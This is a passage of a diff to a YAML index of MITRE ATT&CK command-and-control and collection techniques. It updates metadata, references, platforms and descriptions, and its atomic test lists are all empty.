       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1573
     atomic_tests: []
   T1102.002:
@@ -38516,7 +38994,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:15:47.861Z'
       name: Bidirectional Communication
       description: "Adversaries may use an existing, legitimate external Web service
         as a means for sending commands to and receiving output from a compromised
@@ -38553,8 +39031,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1573.002:
     technique:
@@ -38608,7 +39084,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1095:
     technique:
@@ -38680,33 +39155,12 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1095
     atomic_tests: []
   T1001.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
-      type: attack-pattern
-      created: '2020-03-15T00:40:27.503Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1001.003
-        url: https://attack.mitre.org/techniques/T1001/003
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
-      name: Protocol Impersonation
+      modified: '2024-10-09T15:40:19.436Z'
+      name: Protocol or Service Impersonation
       description: "Adversaries may impersonate legitimate protocols or web service
         traffic to disguise command and control activity and thwart analysis efforts.
         By impersonating legitimate protocols or web services, adversaries can make
@@ -38714,23 +39168,61 @@ command-and-control:
         \ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
         like subsequent traffic is SSL/TLS encrypted, potentially interfering with
         some security tooling, or to make the traffic look like it is related with
-        a trusted entity. "
+        a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+        impersonate expected web traffic or trusted services. For example, adversaries
+        may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+        data to disguise C2 communications or mimic legitimate services such as Gmail,
+        Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+        Malleable-C2-U42)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - James Emery-Callcott, Emerging Threats Team, Proofpoint
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
         sending significantly more data than it receives from a server). Processes
         utilizing the network that do not normally have network communication or have
         never been seen before are suspicious. Analyze packet contents to detect communications
         that do not follow the expected protocol behavior for the port that is being
         used.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+      created: '2020-03-15T00:40:27.503Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1001/003
+        external_id: T1001.003
+      - source_name: Malleable-C2-U42
+        description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+          Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+          How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+          September 24, 2024.'
+        url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      - source_name: ESET Okrum July 2019
+        description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+          RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1090.004:
     technique:
@@ -38777,7 +39269,6 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1132:
     technique:
@@ -38837,7 +39328,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.002:
     technique:
@@ -38869,7 +39359,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-14T23:39:50.117Z'
       name: Non-Standard Encoding
       description: 'Adversaries may encode data with a non-standard data encoding
         system to make the content of command and control traffic more difficult to
@@ -38895,8 +39385,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.001:
     technique:
@@ -38963,7 +39451,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.001
     atomic_tests: []
   T1105:
@@ -39061,7 +39548,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1105
     atomic_tests: []
   T1665:
@@ -39154,7 +39640,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1001.002:
     technique:
@@ -39178,7 +39663,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-15T00:37:58.963Z'
       name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
@@ -39201,8 +39686,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1001.002
     atomic_tests: []
   T1008:
@@ -39227,7 +39710,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:49:47.340Z'
       name: Fallback Channels
       description: Adversaries may use fallback or alternate communication channels
         if the primary channel is compromised or inaccessible in order to maintain
@@ -39247,8 +39730,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.001:
     technique:
@@ -39302,7 +39783,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.001
     atomic_tests: []
   T1102.001:
@@ -39327,7 +39807,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:12:30.499Z'
       name: Dead Drop Resolver
       description: |-
         Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -39353,8 +39833,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1001.001:
     technique:
@@ -39408,7 +39886,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 collection:
   T1560.001:
@@ -39484,7 +39961,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560.001
     atomic_tests: []
   T1113:
@@ -39541,7 +40017,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1113
     atomic_tests: []
   T1557:
@@ -39635,7 +40110,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.001:
     technique:
@@ -39714,7 +40188,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests: []
   T1602:
@@ -39753,7 +40226,7 @@ collection:
         Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
 
         Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:32:58.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data from Configuration Repository
       x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -39768,30 +40241,10 @@ collection:
       - 'Network Traffic: Network Connection Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
-      type: attack-pattern
-      created: '2020-02-14T13:35:32.938Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.002
-        url: https://attack.mitre.org/techniques/T1213/002
-      - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
-        description: Microsoft. (2017, July 19). Configure audit settings for a site
-          collection. Retrieved April 4, 2018.
-        source_name: Microsoft SharePoint Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Sharepoint
       description: |
         Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
@@ -39800,13 +40253,17 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: "The user access logging within Microsoft's SharePoint can
         be configured to report access to certain pages and documents. (Citation:
         Microsoft SharePoint Logging). As information repositories generally have
@@ -39820,20 +40277,37 @@ collection:
         of programmatic means being used to retrieve all data within the repository.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'Cloud Service: Cloud Service Metadata'
+      type: attack-pattern
+      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+      created: '2020-02-14T13:35:32.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/002
+        external_id: T1213.002
+      - source_name: Microsoft SharePoint Logging
+        description: Microsoft. (2017, July 19). Configure audit settings for a site
+          collection. Retrieved April 4, 2018.
+        url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
     atomic_tests: []
   T1123:
     technique:
-      modified: '2024-01-23T22:53:18.389Z'
+      modified: '2024-10-15T13:39:22.774Z'
       name: Audio Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
@@ -39876,7 +40350,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1123
     atomic_tests: []
   T1560.003:
@@ -39901,7 +40374,7 @@ collection:
         description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
           the Comings and Goings. Retrieved November 21, 2016.'
         source_name: ESET Sednit Part 2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T22:48:14.605Z'
       name: Archive via Custom Method
       description: 'An adversary may compress or encrypt data that is collected prior
         to exfiltration using a custom method. Adversaries may choose to use custom
@@ -39921,22 +40394,24 @@ collection:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Script: Script Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1114:
     technique:
-      modified: '2023-09-29T21:06:03.098Z'
+      modified: '2024-10-15T12:24:27.627Z'
       name: Email Collection
       description: 'Adversaries may target user email to collect sensitive information.
         Emails may contain sensitive data, including trade secrets or personal information,
-        that can prove valuable to adversaries. Adversaries can collect or forward
-        email from mail servers or clients. '
+        that can prove valuable to adversaries. Emails may also contain details of
+        ongoing incident response operations, which may allow adversaries to adjust
+        their techniques in order to maintain persistence or evade defenses.(Citation:
+        TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+        can collect or forward email from mail servers or clients. '
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -39953,11 +40428,10 @@ collection:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '2.5'
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -39973,37 +40447,28 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1114
         external_id: T1114
+      - source_name: CISA AA20-352A 2021
+        description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+          of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+          Retrieved August 30, 2024.
+        url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
       - source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
         description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
           Retrieved October 8, 2019.
         url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+      - source_name: TrustedSec OOB Communications
+        description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+          Out-of-Band Communications are Essential for Incident Response. Retrieved
+          August 30, 2024.'
+        url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1025:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - William Cain
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
-      type: attack-pattern
-      created: '2017-05-31T21:30:31.584Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        url: https://attack.mitre.org/techniques/T1025
-        external_id: T1025
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:30:50.936Z'
       name: Data from Removable Media
       description: "Adversaries may search connected removable media on computers
         they have compromised to find files of interest. Sensitive data can be collected
@@ -40015,75 +40480,93 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - William Cain
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor processes and command-line arguments for actions
         that could be taken to collect files from a system's connected removable media.
         Remote access tools with built-in features may interact directly with the
         Windows API to gather data. Data may also be acquired through Windows system
         management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
         and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
       x_mitre_system_requirements:
       - Privileges to access removable media drive and files
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+      created: '2017-05-31T21:30:31.584Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1025
+        external_id: T1025
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1025
     atomic_tests: []
   T1074.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Massimiliano Romano, BT Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
-      created: '2020-03-13T21:13:10.467Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.001
-        url: https://attack.mitre.org/techniques/T1074/001
-      - source_name: Prevailion DarkWatchman 2021
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
-        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
-          new evolution in fileless techniques. Retrieved January 10, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:28:39.920Z'
+      name: 'Data Staged: Local Data Staging'
       description: |-
         Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
 
         Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Data Staged: Local Data Staging'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Massimiliano Romano, BT Security
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+      created: '2020-03-13T21:13:10.467Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/001
+        external_id: T1074.001
+      - source_name: Prevailion DarkWatchman 2021
+        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+          new evolution in fileless techniques. Retrieved January 10, 2022.'
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1074.001
     atomic_tests: []
   T1114.001:
@@ -40110,7 +40593,7 @@ collection:
         url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
         description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
           .ost). Retrieved February 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T17:59:20.983Z'
       name: 'Email Collection: Local Email Collection'
       description: |-
         Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
@@ -40134,13 +40617,11 @@ collection:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1114.001
     atomic_tests: []
   T1119:
     technique:
-      modified: '2024-01-02T13:35:57.680Z'
+      modified: '2024-09-25T20:40:07.791Z'
       name: Automated Collection
       description: "Once established within a system or network, an adversary may
         use automated techniques for collecting internal data. Methods for performing
@@ -40161,6 +40642,7 @@ collection:
         phase_name: collection
       x_mitre_contributors:
       - Praetorian
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Depending on the method used, actions could include common
         file system commands and parameters on the command-line interface within batch
@@ -40184,8 +40666,10 @@ collection:
       - Windows
       - IaaS
       - SaaS
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
+      - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Script: Script Execution'
@@ -40210,7 +40694,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1119
     atomic_tests: []
   T1115:
@@ -40277,12 +40760,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1115
     atomic_tests: []
   T1530:
     technique:
-      modified: '2023-09-29T16:11:43.530Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Data from Cloud Storage Object
       description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
         offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -40316,10 +40798,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Netskope
       - Praetorian
       - AppOmni
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
         service. Activity originating from unexpected sources may indicate improper
@@ -40330,13 +40814,14 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
